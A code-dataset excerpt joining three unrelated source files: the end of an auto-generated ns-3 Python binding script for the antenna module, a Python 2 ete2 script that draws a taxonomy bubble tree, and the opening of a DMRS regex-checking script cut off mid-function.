## antenna-model.h (module 'antenna'): ns3::AntennaModel::AntennaModel(ns3::AntennaModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AntennaModel const &', 'arg0')])
## antenna-model.h (module 'antenna'): ns3::AntennaModel::AntennaModel() [constructor]
cls.add_constructor([])
## antenna-model.h (module 'antenna'): double ns3::AntennaModel::GetGainDb(ns3::Angles a) [member function]
cls.add_method('GetGainDb',
'double',
[param('ns3::Angles', 'a')],
is_pure_virtual=True, is_virtual=True)
## antenna-model.h (module 'antenna'): static ns3::TypeId ns3::AntennaModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3CosineAntennaModel_methods(root_module, cls):
## cosine-antenna-model.h (module 'antenna'): ns3::CosineAntennaModel::CosineAntennaModel() [constructor]
cls.add_constructor([])
## cosine-antenna-model.h (module 'antenna'): ns3::CosineAntennaModel::CosineAntennaModel(ns3::CosineAntennaModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CosineAntennaModel const &', 'arg0')])
## cosine-antenna-model.h (module 'antenna'): double ns3::CosineAntennaModel::GetBeamwidth() const [member function]
cls.add_method('GetBeamwidth',
'double',
[],
is_const=True)
## cosine-antenna-model.h (module 'antenna'): double ns3::CosineAntennaModel::GetGainDb(ns3::Angles a) [member function]
cls.add_method('GetGainDb',
'double',
[param('ns3::Angles', 'a')],
is_virtual=True)
## cosine-antenna-model.h (module 'antenna'): double ns3::CosineAntennaModel::GetOrientation() const [member function]
cls.add_method('GetOrientation',
'double',
[],
is_const=True)
## cosine-antenna-model.h (module 'antenna'): static ns3::TypeId ns3::CosineAntennaModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## cosine-antenna-model.h (module 'antenna'): void ns3::CosineAntennaModel::SetBeamwidth(double beamwidthDegrees) [member function]
cls.add_method('SetBeamwidth',
'void',
[param('double', 'beamwidthDegrees')])
## cosine-antenna-model.h (module 'antenna'): void ns3::CosineAntennaModel::SetOrientation(double orientationDegrees) [member function]
cls.add_method('SetOrientation',
'void',
[param('double', 'orientationDegrees')])
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3IsotropicAntennaModel_methods(root_module, cls):
## isotropic-antenna-model.h (module 'antenna'): ns3::IsotropicAntennaModel::IsotropicAntennaModel(ns3::IsotropicAntennaModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IsotropicAntennaModel const &', 'arg0')])
## isotropic-antenna-model.h (module 'antenna'): ns3::IsotropicAntennaModel::IsotropicAntennaModel() [constructor]
cls.add_constructor([])
## isotropic-antenna-model.h (module 'antenna'): double ns3::IsotropicAntennaModel::GetGainDb(ns3::Angles a) [member function]
cls.add_method('GetGainDb',
'double',
[param('ns3::Angles', 'a')],
is_virtual=True)
## isotropic-antenna-model.h (module 'antenna'): static ns3::TypeId ns3::IsotropicAntennaModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3ParabolicAntennaModel_methods(root_module, cls):
## parabolic-antenna-model.h (module 'antenna'): ns3::ParabolicAntennaModel::ParabolicAntennaModel() [constructor]
cls.add_constructor([])
## parabolic-antenna-model.h (module 'antenna'): ns3::ParabolicAntennaModel::ParabolicAntennaModel(ns3::ParabolicAntennaModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ParabolicAntennaModel const &', 'arg0')])
## parabolic-antenna-model.h (module 'antenna'): double ns3::ParabolicAntennaModel::GetBeamwidth() const [member function]
cls.add_method('GetBeamwidth',
'double',
[],
is_const=True)
## parabolic-antenna-model.h (module 'antenna'): double ns3::ParabolicAntennaModel::GetGainDb(ns3::Angles a) [member function]
cls.add_method('GetGainDb',
'double',
[param('ns3::Angles', 'a')],
is_virtual=True)
## parabolic-antenna-model.h (module 'antenna'): double ns3::ParabolicAntennaModel::GetOrientation() const [member function]
cls.add_method('GetOrientation',
'double',
[],
is_const=True)
## parabolic-antenna-model.h (module 'antenna'): static ns3::TypeId ns3::ParabolicAntennaModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## parabolic-antenna-model.h (module 'antenna'): void ns3::ParabolicAntennaModel::SetBeamwidth(double beamwidthDegrees) [member function]
cls.add_method('SetBeamwidth',
'void',
[param('double', 'beamwidthDegrees')])
## parabolic-antenna-model.h (module 'antenna'): void ns3::ParabolicAntennaModel::SetOrientation(double orientationDegrees) [member function]
cls.add_method('SetOrientation',
'void',
[param('double', 'orientationDegrees')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3Vector2DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker(ns3::Vector2DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DChecker const &', 'arg0')])
return
def register_Ns3Vector2DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2D const & value) [constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector2DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector2DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector2D ns3::Vector2DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector2D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector2DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector2DValue::Set(ns3::Vector2D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector2D const &', 'value')])
return
def register_Ns3Vector3DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker(ns3::Vector3DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DChecker const &', 'arg0')])
return
def register_Ns3Vector3DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3D const & value) [constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector3DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector3DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector3D ns3::Vector3DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector3D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector3DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector3DValue::Set(ns3::Vector3D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector3D const &', 'value')])
return
def register_Ns3HashImplementation_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor]
cls.add_constructor([])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_pure_virtual=True, is_virtual=True)
## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function]
cls.add_method('clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3HashFunctionFnv1a_methods(root_module, cls):
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a(ns3::Hash::Function::Fnv1a const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')])
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a() [constructor]
cls.add_constructor([])
## hash-fnv.h (module 'core'): uint32_t ns3::Hash::Function::Fnv1a::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-fnv.h (module 'core'): uint64_t ns3::Hash::Function::Fnv1a::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-fnv.h (module 'core'): void ns3::Hash::Function::Fnv1a::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionHash32_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Function::Hash32 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Hash32Function_ptr hp) [constructor]
cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash32::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Function::Hash32::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionHash64_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Function::Hash64 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Hash64Function_ptr hp) [constructor]
cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash64::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): uint64_t ns3::Hash::Function::Hash64::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Function::Hash64::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionMurmur3_methods(root_module, cls):
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3(ns3::Hash::Function::Murmur3 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')])
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3() [constructor]
cls.add_constructor([])
## hash-murmur3.h (module 'core'): uint32_t ns3::Hash::Function::Murmur3::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-murmur3.h (module 'core'): uint64_t ns3::Hash::Function::Murmur3::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-murmur3.h (module 'core'): void ns3::Hash::Function::Murmur3::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_functions(root_module):
module = root_module
## angles.h (module 'antenna'): extern double ns3::DegreesToRadians(double degrees) [free function]
module.add_function('DegreesToRadians',
'double',
[param('double', 'degrees')])
## angles.h (module 'antenna'): extern double ns3::RadiansToDegrees(double radians) [free function]
module.add_function('RadiansToDegrees',
'double',
[param('double', 'radians')])
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
register_functions_ns3_Hash(module.get_submodule('Hash'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def register_functions_ns3_Hash(module, root_module):
register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module)
return
def register_functions_ns3_Hash_Function(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
| gpl-2.0 |
sanja7s/SR_Twitter | src_taxonomy/bubble_tree_map.py | 1 | 3686 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import random
from ete2 import Tree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, TextFace
def layout(node):
if not node.is_root():
# Add node name to laef nodes
#N = AttrFace("name", fsize=14, fgcolor="black")
#faces.add_face_to_node(N, node, 0)
#pass
faces.add_face_to_node(TextFace(node.name), node, 0)
if "weight" in node.features:
# Creates a sphere face whose size is proportional to node's
# feature "weight"
C = CircleFace(radius=node.weight, color="RoyalBlue", style="sphere")
# Let's make the sphere transparent
C.opacity = 0.3
# And place as a float face over the tree
faces.add_face_to_node(C, node, 0, position="float")
def give_tree_layout(t):
# Some random features in all nodes
for n in t.traverse():
n.add_features(weight=n.dist*20)
# Create an empty TreeStyle
ts = TreeStyle()
# Set our custom layout function
ts.layout_fn = layout
# Draw a tree
#ts.mode = "c"
#ts.arc_start = -180
#ts.arc_span = 180
# We will add node names manually
#ts.show_leaf_name = True
# Show branch data
#ts.show_branch_length = True
#ts.show_branch_support = True
return ts
class Tree7s(object):
def __init__(self, lab):
self.root = Node7s(lab, 0, 0)
def find_root(self):
return self.root
class Node7s(object):
def __init__(self, data, score, lev):
self.data = data
self.score = score
self.level = lev
self.children = []
def add_child(self, lab, score, lev):
if int(self.level) == int(lev-1):
nn = self.find_child(lab)
if nn == None:
self.children.append(Node7s(lab, score, lev))
else:
nn.increase_score(score)
else:
print "Trying to add to a wrong level?", lev-1, self.level, lab, self.data
def find_child(self, label):
for el in self.children:
if el.data == label:
return el
return None
def increase_score(self, sc):
self.score += sc
def print_me(self):
print self.data, self.score
for el in self.children:
el.print_me()
def create_newick(self):
if self.children == []:
return str(self.data + ":" + str(self.score))
newick = "("
for el in self.children:
newick += el.create_newick() + ","
newick = newick[:-1]
if self.level == 0:
newick += ")" + str(self.data) + "."
else:
newick += ")" + str(self.data) + ":" + str(self.score)
return newick
def test_data():
D = {'taxonomy': [{"score": "0.718868", "label": "/art and entertainment/movies and tv/movies"},\
{"confident": "no", "score": "0.304296", "label": "/pets/cats"},\
{"score": "0.718868", "label": "/art and entertainment/movies and tv/series"}]}
t7s = Tree7s("ThingAdamsFamily")
for el in D["taxonomy"]:
#n = t7s
n = t7s.find_root()
taxonomy_tree = el["label"]
taxonomy_tree = taxonomy_tree.split("/")
taxonomy_tree.pop(0)
levels = len(taxonomy_tree)
score = float(el["score"])
print levels, taxonomy_tree, score
for i in range(levels):
label = taxonomy_tree[i]
#if n.find_child(label) == None:
n.add_child(label, score, i+1)
n = n.find_child(label)
t7s.find_root().print_me()
t = t7s.find_root()
S = t.create_newick() + ";"
print S
#S = "(((A,B,(C.,D)E)F,(S,N)K)R);"
#T = Tree(S, format=8)
T = Tree(S, format=1)
for node in T.traverse("postorder"):
# Do some analysis on node
print node.name
for node in T.traverse("levelorder"):
# Do some analysis on node
print node.name
#for branch in T
return T
if __name__ == "__main__":
#t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
#t.show(tree_style=ts)
t = test_data()
ts = give_tree_layout(t)
t.show(tree_style=ts)
t.render("bubble_map.png", w=600, dpi=300, tree_style=ts) | mit |
nmndeep/Multi_lingual-tools | dmrs_chk.py | 1 | 5743 | import os
import re
def ff():
path='path_to_ace/ace-0.9.24/output'
srr=r'_human_dmrs.txt'
ans_fil=[]
#get user input for checking in regex.
print("1- check for lemma relations\n2-check for gpred-x\n3-check for gpred-e\n4-check for realpred-x\n5-check for realpred-e")
que=eval(raw_input())
# for lemma relation check
if que is 1:
print "Enter one number from the following:"
print"1.lemma-lemma:R\n 2.feat-lemma:R\n3.feat-feat:R\n4.lemma-feat:R"
inp_1=eval(raw_input())
if inp_1 is 1:
print"Enter the two lemma's whose relation to be checked:"
lem_1=raw_input()
lem_2=raw_input()
reg= r'\"%s\"\s+to=\"\d+"\s+\"%s\"><rargname>' %(lem_1,lem_2)
elif inp_1 is 2:
print"Enter the feat and lemma whose relation to be checked:"
lem_1=raw_input()
lem_2=raw_input()
reg= r'%s\s+to=\"\d+"\s+\"%s\"><rargname>' %(lem_1,lem_2)
elif inp_1 is 3:
print"Enter the two feat's whose relation to be checked:"
lem_1=raw_input()
lem_2=raw_input()
reg= r'%s\s+to=\"\d+"\s+%s><rargname>' %(lem_1,lem_2)
elif inp_1 is 4:
print"Enter the lemma and feat whose relation to be checked:"
lem_1=raw_input()
lem_2=raw_input()
reg= r'\"%s\"\s+to=\"\d+"\s+%s><rargname>' %(lem_1,lem_2)
# for gpred-x checking.
elif que is 2:
print "enter the feature whose value is to be checked:"
lem_1=raw_input()
print "Cvarsort :x"
print"num:"
lem_2=raw_input()
print"pers:"
lem_3=eval(raw_input())
print"pt:"
lem_4=raw_input()
reg=r'<gpred>%s</gpred><sortinfo\s+cvarsort=\"x\"\s+num=\"%s\"\s+pers=\"%u\"\s+pt=\"%s\"' %(lem_1,lem_2,lem_3,lem_4)
# for gpred-e checking.
elif que is 3:
print "enter the feature whose value is to be checked:"
lem_1=raw_input()
print "Cvarsort :e"
print"mood:"
lem_2=raw_input()
print"perf:"
lem_3=raw_input()
print"prog:"
lem_4=raw_input()
print"sf:"
lem_5=raw_input()
print"tense:"
lem_6=raw_input()
reg=r'<gpred>%s</gpred><sortinfo\s+cvarsort=\"e\"\s+mood=\"%s\"\s+perf=\"%s\"\s+prog=\"%s\"\s+sf=\"%s\"\s+tense=\"%s\"' %(lem_1,lem_2,lem_3,lem_4,lem_5,lem_6)
# for realpred-x checking
elif que is 4:
print "Cvarsort :x"
print "Enter the lemma whose value is to be checked:"
lem_1=raw_input()
print"pos:"
lem_2=raw_input()
print"sense:"
lem_3=raw_input()
print"num:"
lem_5=raw_input()
print"pers:"
